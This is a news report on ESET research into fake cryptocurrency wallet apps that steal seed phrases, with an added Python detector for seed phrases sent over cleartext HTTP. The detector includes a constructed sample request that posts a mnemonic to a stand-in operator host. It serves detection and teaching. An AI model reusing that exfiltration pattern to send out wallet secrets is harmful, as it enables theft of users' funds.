Research by cybersecurity firm ESET has uncovered a "sophisticated scheme" that spreads Trojan apps masquerading as popular cryptocurrency wallets.
The scheme targets both Android and iOS devices; a device is put at risk only when its user installs one of the fake apps.
According to ESET research, these malicious apps spread through fake websites and mimic legitimate crypto wallets, including MetaMask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey.
The company also found 13 malicious apps posing as the Jaxx Liberty wallet that were distributed through the Google Play Store. Google has since removed them, after more than 1,100 installs, but many more remain on other websites and social media platforms.
Threat actors spread their wares through social media groups on Facebook and Telegram with the intention of stealing crypto assets from victims. ESET claims to have discovered "dozens of trojanized cryptocurrency wallet apps" dating back to May 2021. It also said the scheme was believed to be the work of a group that primarily targeted Chinese users through Chinese websites.
Lukáš Štefanko, the researcher who unraveled the scheme, said the apps expose victims in other ways as well, such as sending the victim's seed phrase to the attacker's server over an unsecured (unencrypted) connection, adding:
"This means victims' funds could have been stolen not only by the scheme's operators, but also by different attackers who were eavesdropping on the same network."
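A seed phrase posted over cleartext HTTP is readable by anyone on the path, which is exactly why Štefanko's eavesdropper could steal it; the same property lets a passive network sensor catch the leak. The following is an added example, not ESET's code or anything from the campaign, of a detector for plaintext HTTP requests whose body carries a BIP-39-shaped mnemonic. The wordlist is a labelled subset of the real 2048-word English list (every word in it is genuine, but a production check must load the full list), and the request captures and hostnames are constructed.

```python
"""Flag cleartext HTTP requests that appear to carry a BIP-39 seed phrase.

Added example, not from the ESET report. TLS traffic never reaches a parser
like this, so a hit means the phrase crossed the wire readable to anyone on
the same network segment.
"""
import json
import re
from urllib.parse import parse_qs

# Constructed stand-in for the 2048-word BIP-39 English wordlist. Every word
# here is in the real list, but a phrase using words outside this subset will
# be rejected, so load the full list in production.
BIP39_SUBSET = frozenset("""
abandon ability able about above absent absorb abstract absurd abuse access
accident account accuse achieve acid acoustic acquire across act action actor
legal winner thank year wave sausage worth useful yellow zoo
""".split())

# Mnemonic lengths permitted by BIP-39 (128 to 256 bits of entropy).
VALID_LENGTHS = frozenset({12, 15, 18, 21, 24})


def looks_like_mnemonic(text, wordlist=BIP39_SUBSET):
    """True if text is a 12/15/18/21/24-word phrase drawn entirely from the wordlist."""
    words = text.strip().lower().split()
    return len(words) in VALID_LENGTHS and all(w in wordlist for w in words)


def _body_fields(headers, body):
    """Yield (name, value) pairs from a form-encoded or JSON request body."""
    ctype = headers.get("content-type", "").lower()
    if "json" in ctype:
        try:
            doc = json.loads(body)
        except ValueError:
            return
        if isinstance(doc, dict):
            for key, value in doc.items():
                if isinstance(value, str):
                    yield key, value
        return
    # Form bodies: parse_qs decodes '+' and percent-escapes for us.
    for key, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            yield key, value


def find_seed_leaks(raw_request, wordlist=BIP39_SUBSET):
    """Return [(field, normalised phrase)] for every body field of a plaintext
    HTTP request that looks like a BIP-39 mnemonic; [] if nothing matches."""
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not re.match(r"^(POST|PUT|PATCH) \S+ HTTP/1\.[01]$", lines[0]):
        return []  # only methods that carry a body are of interest
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return [(key, " ".join(value.lower().split()))
            for key, value in _body_fields(headers, body)
            if looks_like_mnemonic(value, wordlist)]


# Constructed captures, not real traffic. The first is the shape of request a
# trojanized wallet would send when the victim "imports" a wallet: the phrase
# goes to the operator's server in a plain form POST. The second is a benign
# login and must not match (four words, not a valid mnemonic length).
LEAKY_REQUEST = (
    "POST /api/wallet/import HTTP/1.1\r\n"
    "Host: wallet-update.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "mnemonic=legal+winner+thank+year+wave+sausage+worth+useful"
    "+legal+winner+thank+yellow&pin=1234"
)

BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: wallet-update.example\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"user": "alice", "password": "correct horse battery staple"}'
)

if __name__ == "__main__":
    for request in (LEAKY_REQUEST, BENIGN_REQUEST):
        print(find_seed_leaks(request))
```

Fed reassembled HTTP streams from a tap or a proxy log, the same check works as a detection rule; the deliberate limitation is that it only sees cleartext, so a wallet that exfiltrates over TLS to an attacker-controlled host needs a different control (egress allow-listing or certificate inspection) rather than content matching.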
The fake wallet behaves slightly differently depending on the platform. On Android, the scheme targets people who are new to cryptocurrency and do not yet have a wallet app installed: the fake site prompts them to install a "suitable" wallet, and the trojanized app takes the place of the legitimate one. On iOS, the fake apps are not delivered through Apple's App Store; the victim installs them from the fake website and has to trust the code-signing certificate they were signed with. A victim can therefore end up with two wallets installed side by side, the real one and the Trojan, but the risk on iOS is lower in practice because most users install only what the App Store has vetted.
ESET recommends that cryptocurrency investors and traders only install wallets from trusted sources linked to the official website of the exchange or company.
In February, Google Cloud launched its Virtual Machine Threat Detection (VMTD) system, which scans for "cryptojacking" malware, malware that hijacks a victim's computing resources to mine digital assets.
According to a January Chainalysis report, between 2017 and 2021, cryptojacking accounted for 73% of the total value received by malware-related wallets and addresses.